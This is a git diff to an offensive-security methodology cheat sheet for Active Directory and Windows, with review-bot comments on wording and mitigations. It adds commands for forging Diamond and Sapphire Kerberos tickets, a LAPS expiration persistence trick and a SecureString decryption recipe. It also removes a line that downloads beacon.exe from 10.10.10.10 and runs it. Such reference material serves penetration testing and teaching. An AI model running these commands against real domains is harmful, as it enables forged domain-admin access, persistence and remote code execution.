diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 40625c9..0878006 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -56,6 +56,8 @@ - [Using Meterpreter](#using-meterpreter) - [Using a ticket on Linux](#using-a-ticket-on-linux) - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) + - [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets) + - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets) - [Kerberoasting](#kerberoasting) - [KRB_AS_REP Roasting](#krbasrep-roasting) - [Pass-the-Hash](#pass-the-hash) @@ -1605,9 +1607,11 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred - ### Pass-the-Ticket Golden Tickets -Forging a TGT require the `krbtgt` NTLM hash +Forging a TGT require: +* the `krbtgt` NT hash +* since recently, we cannot use a non-existent account name as a result of `CVE-2021-42287` mitigations -> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used. +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used. #### Using Mimikatz 
@@ -1708,6 +1712,38 @@ Interesting services to target with a silver ticket : Mitigations: * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. + +### Pass-the-Ticket Diamond Tickets + +> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key + +Require: +* krbtgt NT Hash +* krbtgt AES key + +```ps1 +ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser' + +Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS +``` + + +### Pass-the-Ticket Sapphire Tickets + +> Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT). + +The goal is to mimic the PAC field as close as possible to a legitimate one. + +Require: +* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) +* krbtgt AES key + +```ps1 +# baduser argument will be ignored +ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser' +``` + + ### Kerberoasting > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) 
@@ -1862,7 +1898,7 @@ The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since set SMBUser jarrieta set SMBPass nastyCutt3r # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. - # NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) + # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) set PAYLOAD windows/meterpreter/bind_tcp run shell @@ -1893,7 +1929,7 @@ $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL ### OverPass-the-Hash (pass the key) -In this technique, instead of passing the hash directly, we use the NTLM hash of an account to request a valid Kerberost ticket (TGT). +In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). #### Using impacket @@ -3993,3 +4029,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) * [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) +* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) +* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) +* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5793abc..26fba39 100644 
--- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -588,6 +588,14 @@ kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-20 kerberos::tgt ``` +### LAPS Persistence + +To prevent a machine to update its LAPS password, it is possible to set the update date in the futur. + +```ps1 +Set-DomainObject -Identity -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"} +``` + ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index c7a5b3c..a2abf5a 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -9,9 +9,10 @@ * [Metasploit](#metasploit) * [Metasploit - SMB](#metasploit---smb) * [Metasploit - Psexec](#metasploit---psexec) -* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [WinRM](#winrm) * [Powershell Remoting](#powershell-remoting) + * [Powershell Credentials](#powershell-credentials) + * [Powershell Secure String](#powershell-secure-strings) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) 
@@ -121,16 +122,6 @@ root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3 root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami' ``` -## Remote Code Execution with PS Credentials - -```powershell -PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force -PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) -PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} -PS C:\> New-PSSESSION -NAME PSDC -ComputerName COMPUTER01; Invoke-Command -ComputerName COMPUTER01 -ScriptBlock {whoami} -PS C:\> Invoke-Command -ComputerName COMPUTER01 -ScriptBlock {powershell Invoke-WebRequest -Uri 'http://10.10.10.10/beacon.exe' -OutFile 'C:\Temp\beacon.exe'; Start-Process -wait C:\Temp\beacon.exe} -``` - ## WinRM Require: @@ -173,7 +164,6 @@ conn.shell(:powershell) do |shell| end ``` - ## Powershell Remoting > PSSESSION @@ -201,6 +191,23 @@ PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service } PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1 ``` +### Powershell Credentials + +```ps1 +PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force +PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass) +``` + +### Powershell Secure String + +```ps1 +$aesKey = (49, 222, 253, 86, 26, 137, 92, 43, 29, 200, 17, 203, 88, 97, 39, 38, 60, 119, 46, 44, 219, 179, 13, 194, 191, 199, 78, 10, 4, 40, 87, 159) +$secureObject = ConvertTo-SecureString -String "76492d11167[SNIP]MwA4AGEAYwA1AGMAZgA=" -Key $aesKey +$decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject) +$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted) +$decrypted +``` + ## Winexe
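Review bot: in the Active Directory Attack.md hunk at `@@ -1605,9 +1607,11 @@`, "Forging a TGT require:" should read "Forging a TGT requires:", and the second bullet's "since recently" is too vague for a reference sheet; state the condition directly, e.g. `* an existing account name: since the CVE-2021-42287 mitigations, a ticket forged for a non-existent account is rejected`. Phrasing it as a requirement (rather than "we cannot") also keeps the bullet list parallel with the `krbtgt` NT hash entry above it.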
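Review bot: in the Active Directory Attack.md hunk at `@@ -1708,6 +1712,38 @@`, the Diamond Tickets "Require" list names both the krbtgt NT hash and the krbtgt AES key, but the Rubeus line only takes one `/krbkey` matching `/enctype`, and the ticketer.py placeholders `'krbtgt/service NT hash'` / `'krbtgt/service AES key'` look copied from the silver-ticket usage; here it is always the krbtgt key, so write `'krbtgt NT hash'` and `'krbtgt AES key'` and say the key must match the chosen enctype. Both new "Require:" lines should read "Requires:", and the ticketer.py commands are Linux shell but sit in ```ps1 fences (only the Rubeus line is PowerShell-ish). Finally, the Silver Tickets section just above ends with a "Mitigations:" bullet; the two new sections have none. Since both techniques hinge entirely on possession of the krbtgt key (the Sapphire section even states the PAC is made to look legitimate, so PAC-content checks are not a detection), a short "Mitigations:" bullet pointing at krbtgt key protection and rotation, which invalidates tickets forged with the old key, would keep the sections consistent.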
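Review bot: in the Active Directory Attack.md hunk at `@@ -1893,7 +1929,7 @@`, the modified line still carries the typo "Kerberost ticket (TGT)"; since the line is being touched anyway, fix it to "Kerberos ticket (TGT)".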
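Review bot: in the Windows - Persistence.md hunk at `@@ -588,6 +588,14 @@`, the `Set-DomainObject` line is missing the value for `-Identity`, so it does not run as written; use an obvious placeholder, e.g. `Set-DomainObject -Identity 'TARGETCOMPUTER$' -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}`. The sentence above it should read "To prevent a machine from updating its LAPS password, it is possible to set the expiration date in the future." It would also help the reader to say that the attribute holds a Windows FILETIME (100-nanosecond intervals since 1601), which is why the value is such a large integer, and that this only works where the LAPS policy "Do not allow password expiration time longer than required by policy" is not enabled, since with that setting the client resets an out-of-policy expiration time; that is the defensive caveat the section currently lacks.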
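Review bot: in the Windows - Using credentials.md hunk at `@@ -9,9 +9,10 @@`, the new TOC entry links to `#powershell-secure-strings`, but the heading added later in the same file is "### Powershell Secure String" (singular), which renders as the anchor `#powershell-secure-string`; the link is dead as written. Change either the anchor or the heading so they agree.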
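Review bot: in the Windows - Using credentials.md hunk at `@@ -121,16 +122,6 @@`, removing the "Remote Code Execution with PS Credentials" block also drops the only line that actually consumes the credential object (`Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami}`), and the replacement "Powershell Credentials" section added further down builds `$cred` but never uses it. Carry one `Invoke-Command ... -Credential $cred` line over into the new section so the two halves (build the credential, pass it to remoting) stay together.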
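Review bot: in the Windows - Using credentials.md hunk at `@@ -201,6 +191,23 @@`, the "Powershell Secure String" block overwrites the BSTR pointer returned by `SecureStringToBSTR` with the managed string and never frees it, so the decrypted copy stays in unmanaged memory; keep the pointer and release it: `$ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject)`, `$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($ptr)`, `[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr)`. A one-line explanation of where `$aesKey` and the `76492d11167[SNIP]...` string come from (a secure string exported with `ConvertFrom-SecureString -Key`, typically recovered from a script or config alongside its key) would tell the reader when this recipe applies, as opposed to a string exported without `-Key`, which is DPAPI-protected and only decrypts in the original user's context on the original host. Minor: the new blocks are fenced as ```ps1 while the block removed earlier in this file used ```powershell; pick one for the file.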